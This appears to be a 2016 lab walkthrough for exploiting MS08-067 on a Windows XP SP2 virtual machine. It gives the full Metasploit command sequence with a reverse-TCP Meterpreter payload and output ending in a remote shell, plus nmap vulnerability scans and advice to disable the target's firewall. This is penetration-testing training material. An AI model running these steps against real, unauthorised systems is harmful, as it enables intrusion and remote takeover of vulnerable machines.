Attacking Windows XP with Metasploit
2016-01-06 17:06
This lab uses the following resources:
Kali Linux image
Windows XP SP2 image
Start the attack from Kali Linux:
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST TARGETIP
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST YOURIP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.71.105:4445
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800
meterpreter > shell
Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
That is the whole exploitation process. If no meterpreter prompt appears at the end, the exploit failed; work through the following steps.
Scan the target to check whether the vulnerable port can actually be attacked:
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 TARGETIP
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
The result does not contain "MS08-067: VULNERABLE", so the vulnerability cannot be exploited on this host. Note that this lab relies on MS08-067, which Windows XP SP2 does have.
Switch to the XP SP2 machine and scan again:
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 TARGETIP
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
If the port state is "filtered", a firewall is blocking it. In that case turn off the firewall on the target machine and scan again:
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds
The vulnerability is exploitable; now run the exploitation steps above.